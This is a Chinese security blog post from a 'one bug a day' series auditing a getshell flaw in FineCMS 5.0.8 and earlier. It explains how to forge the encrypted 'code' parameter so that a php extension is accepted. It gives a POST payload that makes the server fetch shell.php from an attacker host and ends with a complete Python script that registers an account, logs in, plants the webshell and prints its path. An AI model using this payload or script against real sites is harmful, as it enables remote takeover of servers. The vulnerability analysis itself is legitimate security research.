通杀FineCMS5.0.8及版本以下getshell的漏洞(每天一洞)
2018-02-28

前言

这几天都挺忙的,刚开学也在做比赛的培训,每天一洞这个事情一定得坚持下去,跟着上次的finecms,在漏洞时代又找了一个漏洞来审计。但是他改了函数里面的传参,我也弄了一阵子才搞明白这个传参原来需要加密过的参数,还有就是这个远程下载再上传,有个小问题,那篇文章没有说明,等下再系统说下。

漏洞详情

代码位置和代码

  • 位置
    \finecms\dayrui\controllers\member\Api.php
  • 代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
public function down_file() {

$p = array();
$url = explode('&', $this->input->post('url'));
//经过& 分割

foreach ($url as $t) {
$item = explode('=', $t);
$p[$item[0]] = $item[1];
}
//经过 = 分割
!$this->uid && exit(dr_json(0, fc_lang('游客不允许上传附件')));
//对$p['code'] 进行解码
list($size, $ext) = explode('|', dr_authcode($p['code'], 'DECODE'));
//得到尺寸和后缀
$path = SYS_UPLOAD_PATH.'/'.date('Ym', SYS_TIME).'/';
!is_dir($path) && dr_mkdirs($path);

$furl = $this->input->post('file');
$file = dr_catcher_data($furl);
//dr_catcher_data 是读取远程文件
!$file && exit(dr_json(0, '获取远程文件失败'));

$fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名
!@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));

$filename = substr(md5(time()), 0, 7).rand(100, 999);
if (@file_put_contents($path.$filename.'.'.$fileext, $file)) {
$info = array(
'file_ext' => '.'.$fileext,
'full_path' => $path.$filename.'.'.$fileext,
'file_size' => filesize($path.$filename.'.'.$fileext)/1024,
'client_name' => '',
);

执行过程

Payload代码

http://finecmstest.com/index.php?s=member&c=api&m=down_file

POST:url=code=d628NBt44h5NLBYyi2QIPBI37HOHqQJz/JvPubFBaG5c&file=http://192.168.232.128/shell.php

执行结果

finecms_down1

finecms_down1

分析过程

老样子,挑重要的代码来读,跟着我的思路能读懂这段函数的流程。

  • $p = array();创建一个数组,为下面的遍历赋值所用。
    $url = explode('&', $this->input->post('url'));接收url参数的值,explode这个函数就不用多说了,用于把字符串转换成数组,以&分割为一个数组。
    foreach ($url as $t) {$item = explode('=', $t);$p[$item[0]] = $item[1];} 这一段遍历就是把上面的数组赋值给$p变量。
    !$this->uid && exit(dr_json(0,fc_lang('抱歉!游客不允许上传附件')));判断是否登录
1
2
3
4
5
6
7
$p = array();
$url = explode('&', $this->input->post('url'));
foreach ($url as $t) {
$item = explode('=', $t);
$p[$item[0]] = $item[1];
}
!$this->uid && exit(dr_json(0, fc_lang('抱歉!游客不允许上传附件')));
  • 这段用了list函数,就是把explode的三个值赋值给$size, $ext, $path, 当中用了dr_authcode这个函数,跟进了一下这个函数在\finecms\dayrui\helpers\function_helper.php里面,是一段discuz加密/解密的函数,这个函数主要看的是$key = md5($key ? $key : SYS_KEY);$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string . $keyb), 0, 16) . $string;$string_length = strlen($string);这两句,SYS_KEY这个值在上一篇文章看过了,值是固定的,所以不用理会。下来一句就是如果$operation == ‘DECODE’那就解密,如果不等于DECODE那就加密。
    1
    list($size, $ext, $path) = explode('|', dr_authcode($p['code'], 'DECODE'));
    dr_authcode函数代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    function dr_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

    if (!$string) {
    return '';
    }

    $ckey_length = 4;

    $key = md5($key ? $key : SYS_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);

    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
    $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

    for ($j = $i = 0; $i < 256; $i++) {
    $j = ($j + $box[$i] + $rndkey[$i]) % 256;
    $tmp = $box[$i];
    $box[$i] = $box[$j];
    $box[$j] = $tmp;
    }

    for ($a = $j = $i = 0; $i < $string_length; $i++) {
    $a = ($a + 1) % 256;
    $j = ($j + $box[$a]) % 256;
    $tmp = $box[$a];
    $box[$a] = $box[$j];
    $box[$j] = $tmp;
    $result.= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if ($operation == 'DECODE') {
    if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
    return substr($result, 26);
    } else {
    return '';
    }
    } else {
    return $keyc . str_replace('=', '', base64_encode($result));
    }
    }
  • 这段代码就是生成文件的路径,dr_mkdirs在上一篇的已经解释过了,生成的目录是日期。
    1
    2
    $path = SYS_UPLOAD_PATH.'/'.date('Ym', SYS_TIME).'/';
    !is_dir($path) && dr_mkdirs($path);
  • 继续下面这段,$furl是获取file参数的值,dr_catcher_data这个函数可以跟进看下,只要是获取远程文件的内容的。如果远程文件没有内容就获取失败。
    1
    2
    3
    $furl = $this->input->post('file');
    $file = dr_catcher_data($furl);
    !$file && exit(dr_json(0, '获取远程文件失败'));
  • 这段是判断扩展名的,在这里也说下这几个函数的作用吧,strrchr是把$ful的内容中.后面的值和.一起提取出来;substr返回字符串中1-10的字符串,也就是说刚才提取出来的扩展名.php从1开始只要php;trim去掉两边的空格;strtolower把字符串全部变成小写。
    再下来这句就是判断上传的文件的扩展名$fileext是否在$ext里面。
1
2
$fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名
!@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));
  • 这段的内容就是写文件了,文件名是随机的。
    1
    2
    3
    4
    5
    6
    7
    8
    $filename = substr(md5(time()), 0, 7).rand(100, 999);
    if (@file_put_contents($path.$filename.'.'.$fileext, $file)) {
    $info = array(
    'file_ext' => '.'.$fileext,
    'full_path' => $path.$filename.'.'.$fileext,
    'file_size' => filesize($path.$filename.'.'.$fileext)/1024,
    'client_name' => '',
    );

    构造扩展名参数

    这块内容可以另外当作一节来讲,重新来理顺刚才讲的代码流程就能知道如何来构造扩展名的参数。
    我们逆过来看:
    1.判断$ext里面的扩展名
    2.$ext变量获取在$p['code']数组里面
    3.$p['code']要经过dr_authcode函数的解密
    4.$p['code']又是从$url数组里面提取出来
    所以这里我们可以看到$ext是可控的,而我们要传入加密的$p['code'],我们用dr_authcode加密一遍就行了,在程序里面加入这句代码echo dr_authcode("|php","a");就可以得出加密的值,这个a可以写任意值,只要不写DECODE就行了。|php加密这个就是为了list这个函数的作用。
1
2
3
4
5
6
7
8
9
10
$url = explode('&', $this->input->post('url'));
foreach ($url as $t) {
$item = explode('=', $t);
$p[$item[0]] = $item[1];
}
!$this->uid && exit(dr_json(0, fc_lang('抱歉!游客不允许上传附件')));
//echo dr_authcode("|php","a");
list($size, $ext, $path) = explode('|', dr_authcode($p['code'], 'DECODE'));
$fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名
!@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));

finecms_down3

构造出url的参数为:url=code=ad3eXTkH4Wt084pW46p7DBSt1KX0FwthAs4o9oBH8WVi

构造file参数

构造代码:file=http://192.168.232.128/shell.php

事情没有想得那么简单,这个函数的作用是下载然后再上传,它只是获取显示出来的html的内容然后把这些内容下载下来。所以我们直接在远程服务器写php文件是不可行的。
远程的服务器有一个要求,就是不解析PHP文件,不解析,不就把内容显示出来了么。
最简单的方法就是用装一个apache写一个php文件就行了。
finecms_down4

用Python写Getshell脚本

写这个脚本也是要注册登录获取登录后的状态再getshell
finecms_down5
finecms_down_file.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
'''
author:F0rmat
'''
import sys
import random
import requests
import json
import time

def exploit(target,rtarget):
username = random.randint(0, 999999)
seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
email = []
for i in range(8):
email.append(random.choice(seed))
email = ''.join(email)

# step 1 register
register_url = target + "/index.php?s=member&c=register&m=index"
register_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[password2]": "123456",
"data[email]": email + "@" + email + ".com"}
# step 2 login
login_url = target + "/index.php?s=member&c=login&m=index"
login_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[auto]": "1"}

url = target+"/index.php?s=member&c=api&m=down_file"
payload = {"url":"code=ad3eXTkH4Wt084pW46p7DBSt1KX0FwthAs4o9oBH8WVi","file":rtarget}
# step 3 start hacking"
s = requests.session()
s.post(register_url, data=register_payload)
s.post(login_url, data=login_payload)
res=s.post(url,data=payload).content
hjson = json.loads(res)
if "php" in res:
print "shell:"+target+"/uploadfile/"+time.strftime("%Y%m")+"/"+hjson['name']
else:
print "failure"

if len(sys.argv)<5:
print 'python down_file_getshell.py -h http://127.0.0.1 -r http://10.0.0.1/shell.php'
else:
target = sys.argv[2]
rtarget = sys.argv[4]
exploit(target,rtarget)

结束

02:13:53
为了赶这篇文章现在已经深夜了,为了实现自己的承诺,坚持下去!

参考

http://0day5.com/archives/4405/

https://github.com/F0r3at/Python-Tools/blob/master/finecms/down_file_getshell.py

http://php.net/manual/